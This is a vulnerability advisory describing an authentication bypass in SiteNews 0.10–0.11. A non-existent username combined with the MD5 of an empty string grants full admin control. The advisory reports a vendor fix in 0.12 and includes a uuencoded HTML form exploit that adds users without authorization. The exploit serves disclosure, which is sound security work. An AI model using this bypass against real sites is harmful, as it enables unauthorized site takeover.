SiteNews remote add user exploit

[Ulf H{rnhammar <ulfh () update uu se>]

SiteNews remote add user exploit

PROGRAM: SiteNews
AUTHOR: JP Durman (jp () pgw nl)
HOMEPAGE: http://www.linuxnetwork.nl/
VULNERABLE VERSIONS: 0.10 and 0.11 (possibly older versions as well)
TYPE: remote add user exploit
SEVERITY: high

DESCRIPTION:

SiteNews is an open-sourced system for displaying and managing news items on
websites. According to its homepage, it has been downloaded almost 4000 times.

ISSUE:

The function GetPassword in function.php returns an empty string, when you ask
for a non-existent username. This, together with the fact that the program
sends usernames in cleartext and passwords as MD5 sums, means that you can log
in without an account, by posting a non-existent username and the MD5 sum for
an empty string as the password. SiteNews has no concept of user levels, so
once you are in, you have full control over all news items and all users.

The author was contacted with an explanation, an exploit and a patch on the
5th of February. Version 0.12, which is not vulnerable, was released on the
7th of February.

RECOMMENDATION:

I recommend that all users upgrade to version 0.12 immediately.

EXPLOIT:

Here is my HTML exploit for this issue. It is uuencoded. You type in a non-
existent username and the user and password combination that you wish to add
to the system, and the exploit creates the new user for you, despite the fact
that you are not authorized.

// Ulf Harnhammar
metaur () prontomail com


begin 644 sitenews_exploit.html
M/"%$3T-465!%($A434P@4%5"3$E#("(M+R]7,T,O+T141"!(5$U,(#0N,#$@
M5')A;G-I=&EO;F%L+R]%3B(*(FAT='`Z+R]W=W<N=S,N;W)G+U12+VAT;6PT
M+VQO;W-E+F1T9"(^"CQH=&UL/@H\:&5A9#X*/'1I=&QE/E-I=&5.97=S($5X
M<&QO:70@,"XQ/"]T:71L93X*/&UE=&$@:'1T<"UE<75I=CTB0V]N=&5N="U4
M>7!E(B!C;VYT96YT/2)T97AT+VAT;6P[(&-H87)S970]:7-O+3@X-3DM,2(^
M"CPO:&5A9#X*"CQB;V1Y(&)G8V]L;W(](B-F9F9F9F8B('1E>'0](B,P,#`P
M,#`B(&QI;FL](B,P,#`P,#`B(&%L:6YK/2(C,#`P,#`P(@IV;&EN:STB(S`P
M,#`P,"(^"CQH,3Y3:71E3F5W<R!%>'!L;VET(#`N,3PO:#$^"@H\9F]R;2!M
M971H;V0](E!/4U0B(&%C=&EO;CTB:'1T<#HO+W=W=RYV:6-T:6TN8V]M+W-I
M=&5N97=S+V%D;6EN+V%D9%]U<V5R+G!H<"(*96YC='EP93TB;75L=&EP87)T
M+V9O<FTM9&%T82(^"E=R:71T96X@8GD@/&$@:')E9CTB;6%I;'1O.FUE=&%U
M<D!P<F]N=&]M86EL+F-O;2(^56QF($@F875M;#MR;FAA;6UA<CPO83X@:6X*
M,C`P,BX\<#X*"E1H:7,@97AP;&]I="!W:6QL(&%D9"!A(&YE=R!U<V5R('1O
M(&$@4VET94YE=W,@:6YS=&%L;&%T:6]N+B!4:&4@97AP;&]I="!U<V5R"FES
M(&)A<VEC86QL>2!A;GD@;F]N+65X:7-T96YT('5S97(L('-O('EO=2!J=7-T
M('1Y<&4@<V]M92!R86YD;VT@8VAA<F%C=&5R<PIT:&5R92X\<#X*"D5X<&QO
M:70@=7-E<CH\8G(^"CQI;G!U="!T>7!E/2)T97AT(B!N86UE/2)U<V5R;F%M
M92(@<VEZ93TB,C`B/CQB<CX*/&EN<'5T('1Y<&4](FAI9&1E;B(@;F%M93TB
M<&%S<W=O<F0B"G9A;'5E/2)D-#%D.&-D.3AF,#!B,C`T93DX,#`Y.3AE8V8X
M-#(W92(@<VEZ93TB,"(^"CPA+2T@5&AI<R!I<R!T:&4@340U('-U;2!F;W(@
M86X@96UP='D@<W1R:6YG+B`M+3X*3F5W('5S97(Z/&)R/@H\:6YP=70@='EP
M93TB=&5X="(@;F%M93TB;F5W7W5S97(B('-I>F4](C(P(CX\8G(^"CQI;G!U
M="!T>7!E/2)H:61D96XB(&YA;64](F%C=&EO;C$B('9A;'5E/2(Q(B!S:7IE
M/2(P(CX*3F5W('!A<W-W;W)D.CQB<CX*/&EN<'5T('1Y<&4](G1E>'0B(&YA
M;64](FYE=U]P87-S=V]R9"(@<VEZ93TB,C`B/CQB<CX*/&EN<'5T('1Y<&4]
M(G-U8FUI="(@=F%L=64](D5X<&QO:70@:70B/@H\+V9O<FT^"@H\+V)O9'D^
)"CPO:'1M;#X*
`
end